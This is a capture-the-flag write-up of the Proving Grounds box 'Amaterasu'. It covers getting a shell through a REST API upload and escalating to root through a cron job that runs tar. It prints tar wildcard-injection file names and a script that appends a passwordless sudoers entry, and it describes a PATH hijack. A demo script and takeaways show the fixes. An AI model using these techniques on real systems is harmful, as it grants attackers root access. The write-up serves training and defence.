
Amaterasu -- Proving Grounds (write-up)

Difficulty: Medium Box: Amaterasu (Proving Grounds) Author: dsec Date: 2024-10-18


TL;DR

The REST API's file upload only accepted specific multipart parameter names, found by trial and error. That gave a shell as a low-privileged user; privilege escalation was through a root cron job that ran tar with a wildcard over a user-writable directory, which I used to add sudo rights for that user.


Target info

- Host: discovered via nmap

Enumeration

The enumeration steps were shown as screenshots that are not reproduced here: Nmap results, Nmap continued, Web enumeration, Further enumeration, API discovery, API testing.


REST API file upload

Upload attempt without a "file" parameter (screenshot): the error said no "file" parameter was supplied.

Same request with a "file" parameter added (screenshot): the error changed to "no filename", which points at the part being sent as a plain form field instead of as a file part carrying a filename, so this was getting closer.

Working upload and upload confirmed (screenshots): once the request carried both a part named "file" and a filename, the upload went through.

Shell access

Screenshots not reproduced here: initial shell, user access, enumeration as user.


Privilege escalation -- tar wildcard injection

The cron job called tar by bare name rather than by absolute path, and the PATH it set included a directory I could write to, so I created an executable named tar in that directory: whichever tar the cron job finds first on its PATH is what runs as root (screenshot: tar path).

Alternatively, because the cron job hands tar an unquoted wildcard, the shell expands any file whose name looks like a tar option into tar's command line, and GNU tar accepts options after file operands. Two empty files with these names in the restapi directory are enough (privEsc.sh has to sit in that same directory, because tar runs the command relative to its working directory, and each name is passed as a single argument because glob results are not word-split):

echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh privEsc.sh'

privEsc.sh contents:


#!/bin/bash
echo 'alfredo ALL=(root) NOPASSWD: ALL' >> /etc/sudoers

Once the cron job has fired and the sudoers line is in place, sudo su gives a root shell.
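Both escalation vectors above, reproduced in throwaway directories as an added demo (this is not code from the write-up, and it does not touch /etc/sudoers; the payload only creates a marker file). It assumes GNU tar, since --checkpoint-action is a GNU extension, and coreutils mktemp. It also goes one step beyond the write-up by showing the two invocations a cron job could use instead of a bare *, which is the check a defender wants when auditing crontabs. All file names are constructed for the demo.

```shell
#!/bin/sh
# Added demo: PATH hijack and tar wildcard injection, each in a scratch directory.
# Assumes GNU tar on PATH. Nothing here is taken from the original write-up.

# Vector 1, PATH hijack: a cron job that runs a bare "tar" executes the first "tar"
# found on its PATH. Prints "hijacked" if the tar we drop into a directory placed ahead
# of the real one is what gets executed, "clean" otherwise.
fake_tar_hijack() {
    bindir=$(mktemp -d)
    marker="$bindir/marker"
    printf '#!/bin/sh\ntouch "%s"\n' "$marker" > "$bindir/tar"
    chmod +x "$bindir/tar"
    # env(1) performs a fresh lookup with the modified PATH, mimicking the cron job's environment
    env PATH="$bindir:$PATH" tar -cf /dev/null . >/dev/null 2>&1 || true
    if [ -e "$marker" ]; then echo hijacked; else echo clean; fi
    rm -rf "$bindir"
}

# Vector 2, wildcard injection: runs tar the way a cron job might over a directory seeded
# with the two specially named files. MODE selects the invocation:
#   vulnerable  tar -cf archive *       glob output is parsed as tar options
#   dashdash    tar -cf archive -- *    "--" ends option parsing
#   dotslash    tar -cf archive ./*     every name starts with "./" so none can be an option
# Prints "pwned" if the payload ran, "safe" otherwise.
run_archive_job() {
    mode="$1"
    dir=$(mktemp -d)
    out=$(mktemp)
    marker="$dir/marker"
    (
        cd "$dir" || exit 1
        echo 'print("hello")' > app.py                          # ordinary file in the directory
        printf '#!/bin/sh\ntouch "%s"\n' "$marker" > payload.sh  # stands in for privEsc.sh
        # Empty files whose names are tar options. The glob expands each name into exactly
        # one argument (no word splitting), so the space in the second name survives.
        : > '--checkpoint=1'
        : > '--checkpoint-action=exec=sh payload.sh'
        case "$mode" in
            vulnerable) tar -cf "$out" * ;;
            dashdash)   tar -cf "$out" -- * ;;
            dotslash)   tar -cf "$out" ./* ;;
            *) echo "unknown mode: $mode" >&2; exit 2 ;;
        esac
    ) >/dev/null 2>&1 || true
    if [ -e "$marker" ]; then echo pwned; else echo safe; fi
    rm -rf "$dir" "$out"
}

# Stand-alone run: "sh demo.sh demo" prints one line per scenario.
if [ "${1:-}" = demo ]; then
    echo "PATH hijack: $(fake_tar_hijack)"
    for m in vulnerable dashdash dotslash; do
        printf '%-11s %s\n' "$m:" "$(run_archive_job "$m")"
    done
fi
```

With GNU tar the vulnerable mode reports pwned and the other two report safe, which is the whole audit check in one line: a root crontab whose tar line ends in a bare * over a directory a user can write to is exploitable, and the fix is ./*, --, or a fixed file list, plus absolute paths for every command the job runs.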


Lessons & takeaways

  • REST API file uploads often accept only specific multipart field names; when the error message names the missing part, follow it, otherwise fuzz common field names (file, filename, upload, data) until the server stops complaining
  • Tar wildcard injection with --checkpoint and --checkpoint-action is a reliable privesc whenever root runs tar with a bare * over a directory you can write to; the fix on the defending side is ./* or -- in front of the glob, or a fixed file list
  • Creating files named as option flags is a classic Unix trick that works against any tool invoked with an unquoted wildcard, not only tar
  • A cron job that calls commands by bare name with a writable directory on its PATH is a second, independent escalation path; crontabs should use absolute paths